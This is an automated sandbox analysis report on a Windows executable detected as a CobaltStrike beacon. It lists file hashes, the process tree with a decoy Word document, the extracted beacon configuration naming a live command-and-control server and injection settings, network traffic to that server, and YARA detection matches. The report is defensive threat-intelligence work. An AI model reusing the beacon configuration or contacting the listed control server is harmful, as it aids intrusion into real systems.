Windows Analysis Report
1a#U77e5.exe

Overview

General Information

Sample Name:1a#U77e5.exe
Analysis ID:679126
MD5:3f2202e24ad0a66c08f88a18dd7b5fb4
SHA1:62df51eb1351279afa4dbe5920758d6974427ac9
SHA256:eb94cd39cde6a5270181d6e6788c69a2a90ab2b27f9236c8382e810e4dfead1d
Tags:exe
Infos:

Detection

CobaltStrike
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Yara detected CobaltStrike
C2 URLs / IPs found in malware configuration
Potentially malicious time measurement code found
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality for execution timing, often used to detect debuggers
Found inlined nop instructions (likely shell or obfuscated code)
Drops PE files
Tries to load missing DLLs
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
PE file contains more sections than normal
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • 1a#U77e5.exe (PID: 5296 cmdline: "C:\Users\user\Desktop\1a#U77e5.exe" MD5: 3F2202E24AD0A66C08F88A18DD7B5FB4)
    • ????????????.exe (PID: 3016 cmdline: C:\Windows\Temp\????????????.exe 9gb3vbgeng MD5: 84E3D79DA5E503374E61A17351781C14)
      • conhost.exe (PID: 5860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 5788 cmdline: cmd.exe /c start ?????????????????????.docx MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 2164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • WINWORD.EXE (PID: 5308 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\?????????????????????.docx" /o " MD5: 0B9AB9B9C4DE429473D6450D4297A123)
  • cleanup
{"BeaconType": ["HTTPS"], "Port": 1443, "SleepTime": 60000, "MaxGetSize": 1048576, "Jitter": 0, "C2Server": "124.221.206.154,/submit.php", "HttpPostUri": "/submit.jsp", "Malleable_C2_Instructions": [], "SpawnTo": "AAAAAAAAAAAAAAAAAAAAAA==", "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe", "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 0, "bStageCleanup": "False", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "True", "bProcInject_UseRWX": "True", "bProcInject_MinAllocSize": 0, "ProcInject_PrependAppend_x86": "Empty", "ProcInject_PrependAppend_x64": "Empty", "ProcInject_Execute": ["CreateThread", "SetThreadContext", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}
Source | Rule | Description | Author | Strings
00000003.00000002.706923007.000000C0002D6000.00000004.00001000.00020000.00000000.sdmp | Cobaltbaltstrike_Beacon_Encoded | Detects CobaltStrike payloads | Avast Threat Intel Team
  • 0x0:$s10: TVpBUlVIieVIgewgAAAAS
00000003.00000002.705984762.000000C000174000.00000004.00001000.00020000.00000000.sdmp | Cobaltbaltstrike_Beacon_Encoded | Detects CobaltStrike payloads | Avast Threat Intel Team
  • 0x10:$s10: TVpBUlVIieVIgewgAAAAS
00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp | HKTL_Meterpreter_inMemory | Detects Meterpreter in-memory | netbiosX, Florian Roth
  • 0x3b3ae:$xs1: WS2_32.dll
  • 0x3b8a1:$xs2: ReflectiveLoader
00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp | Trojan_Raw_Generic_4 | unknown | FireEye
  • 0x17b4b:$s0: 83 C0 02 48 8B 7C 24 20 48 8B F0 B9 40 00 00 00 F3 A4 44 0F B6 84 24 A0 00 00 00 BA 40 00 00 00 48 8B 4C 24 20 E8 0F F3 FF FF 48 8B 54 24 20 48 8B 8C 24 98 00 00 00 48 8B 84 24 80 00 00 00 FF ...
  • 0x16f0e:$s1: 0F B7 00 3D 4D 5A 00 00 75 45 48 8B 44 24 20 48 63 40 3C 48 89 44 24 28 48 83 7C 24 28 40 72 2F 48 81 7C 24 28 00 04 00 00 73 24 48 8B 44 24 20 48 8B 4C 24 28 48 03 C8 48 8B C1 48 89 44 24 28 ...
00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp | CobaltStrike_Sleep_Decoder_Indicator | Detects CobaltStrike sleep_mask decoder | yara@s3c.za.net
  • 0x10a48:$sleep_decoder: 48 89 5C 24 08 48 89 6C 24 10 48 89 74 24 18 57 48 83 EC 20 4C 8B 51 08 41 8B F0 48 8B EA 48 8B D9 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9
Source | Rule | Description | Author | Strings
3.2.????????????.exe.25bf8a60000.2.raw.unpack | HKTL_Meterpreter_inMemory | Detects Meterpreter in-memory | netbiosX, Florian Roth
  • 0x3a3ae:$xs1: WS2_32.dll
  • 0x3a8a1:$xs2: ReflectiveLoader
3.2.????????????.exe.25bf8a60000.2.raw.unpack | ReflectiveLoader | Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended | Florian Roth
  • 0x3a8a1:$x1: ReflectiveLoader
3.2.????????????.exe.25bf8a60000.2.raw.unpack | Cobaltbaltstrike_Beacon_x64 | Detects CobaltStrike payloads | Avast Threat Intel Team
  • 0x0:$h01: 4D 5A 41 52 55 48 89 E5 48 81 EC 20 00 00 00 48 8D 1D EA FF FF FF 48 89
  • 0x3aa30:$h13: 2E 2F 2E 2F 2E 2C 2E 26 2E 2C 2E 2F 2E 2C 2B 8D 2E
3.2.????????????.exe.25bf8a60000.2.raw.unpack | CobaltStrike_Sleep_Decoder_Indicator | Detects CobaltStrike sleep_mask decoder | yara@s3c.za.net
  • 0xfe48:$sleep_decoder: 48 89 5C 24 08 48 89 6C 24 10 48 89 74 24 18 57 48 83 EC 20 4C 8B 51 08 41 8B F0 48 8B EA 48 8B D9 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9
3.2.????????????.exe.25bf8a60000.2.raw.unpack | CobaltStrike_C2_Encoded_XOR_Config_Indicator | Detects CobaltStrike C2 encoded profile configuration | yara@s3c.za.net
  • 0x3aa30:$s046: 2E 2F 2E 2F 2E 2C 2E 26 2E 2C 2E 2F 2E 2C 2B 8D 2E 2D 2E 2C 2E 2A 2E 2E C4 4E 2E 2A 2E 2C 2E 2A 2E 3E 2E 2E 2E 2B 2E 2F 2E 2C 2E 2E
No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: 1a#U77e5.exe | Virustotal: Detection: 61%
Source: 1a#U77e5.exe | Metadefender: Detection: 22%
Source: 1a#U77e5.exe | ReversingLabs: Detection: 76%
Source: 1a#U77e5.exe | Avira: detected
Source: https://124.221.206.154:1443/ubmit.phpn | Avira URL Cloud: Label: malware
Source: https://124.221.206.154:1443/ubmit.php | Avira URL Cloud: Label: malware
Source: https://124.221.206.154/n-US | Avira URL Cloud: Label: malware
Source: https://124.221.206.154:1443/ | Avira URL Cloud: Label: malware
Source: https://124.221.206.154/W | Avira URL Cloud: Label: malware
Source: https://124.221.206.154:1443/submit.phpo | Avira URL Cloud: Label: malware
Source: https://124.221.206.154:1443/submit.phpw | Avira URL Cloud: Label: malware
Source: https://124.221.206.154:1443/submit.phpy | Avira URL Cloud: Label: malware
Source: https://124.221.206.154/- | Avira URL Cloud: Label: malware
Source: https://124.221.206.154:1443/submit.phpx | Avira URL Cloud: Label: malware
Source: 124.221.206.154 | Avira URL Cloud: Label: malware
Source: https://124.221.206.154:1443/0; | Avira URL Cloud: Label: malware
Source: https://124.221.206.154:1443/submit.phpI | Avira URL Cloud: Label: malware
Source: https://124.221.206.154:1443/submit.phpQ | Avira URL Cloud: Label: malware
Source: https://124.221.206.154:1443/submit.phpc | Avira URL Cloud: Label: malware
Source: https://124.221.206.154:1443/submit.phpe | Avira URL Cloud: Label: malware
Source: C:\Windows\Temp\????????????.exe | Avira: detection malicious, Label: HEUR/AGEN.1211767
Source: C:\Windows\Temp\????????????.exe | Metadefender: Detection: 25%
Source: C:\Windows\Temp\????????????.exe | ReversingLabs: Detection: 61%
Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTPS"], "Port": 1443, "SleepTime": 60000, "MaxGetSize": 1048576, "Jitter": 0, "C2Server": "124.221.206.154,/submit.php", "HttpPostUri": "/submit.jsp", "Malleable_C2_Instructions": [], "SpawnTo": "AAAAAAAAAAAAAAAAAAAAAA==", "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe", "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 0, "bStageCleanup": "False", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "True", "bProcInject_UseRWX": "True", "bProcInject_MinAllocSize": 0, "ProcInject_PrependAppend_x86": "Empty", "ProcInject_PrependAppend_x64": "Empty", "ProcInject_Execute": ["CreateThread", "SetThreadContext", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}
Source: 1a#U77e5.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Windows\Temp\????????????.exe | Code function: 4x nop then sub rbx, qword ptr [rax+18h] | 3_2_0131B1A0
Source: C:\Windows\Temp\????????????.exe | Code function: 4x nop then mov r8, 0000800000000000h | 3_2_01324AC0

Networking

Source: Malware configuration extractor | URLs: 124.221.206.154
Source: Joe Sandbox View | ASN Name: JCN-AS-KRUlsanJung-AngBroadcastingNetworkKR
Source: global traffic | TCP traffic: 192.168.2.5:49755 -> 124.221.206.154:1443
Source: unknown | TCP traffic detected without corresponding DNS query: 124.221.206.154
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.dr | String found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.dr | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.dr | String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.dr | String found in binary or memory: http://weather.service.msn.com/data.aspx
00000003.00000003.680612251.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.450683931.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.524018797.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://124.221.206.154:1443/submit.phpe
Source: ????????????.exe, 00000003.00000003.650269287.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000002.707886816.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.459728313.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.455168561.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.581376031.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.561061987.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.630445997.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.565837469.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.645791258.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.468267152.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.472644248.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.625692730.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.680612251.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.450683931.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.698330034.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.463998398.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.595821118.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://124.221.206.154:1443/submit.phpo
Source: ????????????.exe, 00000003.00000003.533004895.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://124.221.206.154:1443/submit.phpw
Source: ????????????.exe, 00000003.00000002.707682885.0000025BF36AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://124.221.206.154:1443/submit.phpx
Source: ????????????.exe, 00000003.00000003.528285189.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.511119713.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.550870441.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.546326792.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.650269287.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000002.707886816.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.645791258.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.472644248.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.680612251.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.524018797.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.698330034.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.519760880.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.515437734.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.533004895.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.507141900.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://124.221.206.154:1443/submit.phpy
Source: ????????????.exe, 00000003.00000002.707570619.0000025BF3699000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://124.221.206.154:1443/ubmit.php
Source: ????????????.exe, 00000003.00000002.707570619.0000025BF3699000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://124.221.206.154:1443/ubmit.phpn
Source: ????????????.exe, 00000003.00000002.707570619.0000025BF3699000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://124.221.206.154:1443/ubmit.phpra

System Summary

Source: 3.2.????????????.exe.25bf8a60000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects CobaltStrike sleep_mask decoder Author: yara@s3c.za.net
Source: 3.2.????????????.exe.25bf8a60000.2.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 3.2.????????????.exe.25bf8a60000.2.raw.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 3.2.????????????.exe.25bf8a60000.2.raw.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 3.2.????????????.exe.25bf8a60000.2.raw.unpack, type: UNPACKEDPEMatched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 3.2.????????????.exe.25bf8a60000.2.raw.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
Source: 3.2.????????????.exe.c000294000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects CobaltStrike sleep_mask decoder Author: yara@s3c.za.net
Source: 3.2.????????????.exe.c000294000.1.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 3.2.????????????.exe.c000294000.1.raw.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 3.2.????????????.exe.c000294000.1.raw.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 3.2.????????????.exe.c000294000.1.raw.unpack, type: UNPACKEDPEMatched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 3.2.????????????.exe.c000294000.1.raw.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
Source: 3.2.????????????.exe.c000294000.1.unpack, type: UNPACKEDPEMatched rule: Detects CobaltStrike sleep_mask decoder Author: yara@s3c.za.net
Source: 3.2.????????????.exe.c000294000.1.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 3.2.????????????.exe.c000294000.1.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 3.2.????????????.exe.c000294000.1.unpack, type: UNPACKEDPEMatched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 3.2.????????????.exe.c000294000.1.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
Source: 3.2.????????????.exe.25bf8a60000.2.unpack, type: UNPACKEDPEMatched rule: Detects CobaltStrike sleep_mask decoder Author: yara@s3c.za.net
Source: 3.2.????????????.exe.25bf8a60000.2.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 3.2.????????????.exe.25bf8a60000.2.unpack, type: UNPACKEDPEMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 3.2.????????????.exe.25bf8a60000.2.unpack, type: UNPACKEDPEMatched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 3.2.????????????.exe.25bf8a60000.2.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
Source: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 Author: FireEye
Source: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects CobaltStrike sleep_mask decoder Author: yara@s3c.za.net
Source: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects CobaltStrike sleep_mask decoder Author: yara@s3c.za.net
Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000003.00000002.706659139.000000C000294000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects CobaltStrike sleep_mask decoder Author: yara@s3c.za.net
Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon sleep obfuscation routine Author: unknown
Source: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
Source: Process Memory Space: ????????????.exe PID: 3016, type: MEMORYSTRMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 3.2.????????????.exe.25bf8a60000.2.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, score = , reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/
Source: 3.2.????????????.exe.25bf8a60000.2.raw.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 3.2.????????????.exe.25bf8a60000.2.raw.unpack, type: UNPACKEDPEMatched rule: Cobaltbaltstrike_Beacon_x64 author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 3.2.????????????.exe.25bf8a60000.2.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Sleep_Decoder_Indicator date = 2021-07-19, author = yara@s3c.za.net, description = Detects CobaltStrike sleep_mask decoder
Source: 3.2.????????????.exe.25bf8a60000.2.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration
Source: 3.2.????????????.exe.25bf8a60000.2.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_MZ_Launcher date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike MZ header ReflectiveLoader launcher
Source: 3.2.????????????.exe.25bf8a60000.2.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_CobaltStrike_SleepMask_Jul22 date = 2022-07-04, author = CodeX, description = Detects static bytes in Cobalt Strike 4.5 sleep mask function that are not obfuscated, score = , reference = https://codex-7.gitbook.io/codexs-terminal-window/blue-team/detecting-cobalt-strike/sleep-mask-kit-iocs
Source: 3.2.????????????.exe.25bf8a60000.2.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 3.2.????????????.exe.25bf8a60000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 3.2.????????????.exe.25bf8a60000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 3.2.????????????.exe.25bf8a60000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 3.2.????????????.exe.25bf8a60000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 3.2.????????????.exe.25bf8a60000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 3.2.????????????.exe.c000294000.1.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, score = , reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/
Source: 3.2.????????????.exe.c000294000.1.raw.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 3.2.????????????.exe.c000294000.1.raw.unpack, type: UNPACKEDPEMatched rule: Cobaltbaltstrike_Beacon_x64 author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 3.2.????????????.exe.c000294000.1.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Sleep_Decoder_Indicator date = 2021-07-19, author = yara@s3c.za.net, description = Detects CobaltStrike sleep_mask decoder
Source: 3.2.????????????.exe.c000294000.1.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration
Source: 3.2.????????????.exe.c000294000.1.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_MZ_Launcher date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike MZ header ReflectiveLoader launcher
Source: 3.2.????????????.exe.c000294000.1.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_CobaltStrike_SleepMask_Jul22 date = 2022-07-04, author = CodeX, description = Detects static bytes in Cobalt Strike 4.5 sleep mask function that are not obfuscated, score = , reference = https://codex-7.gitbook.io/codexs-terminal-window/blue-team/detecting-cobalt-strike/sleep-mask-kit-iocs
Source: 3.2.????????????.exe.c000294000.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 3.2.????????????.exe.c000294000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
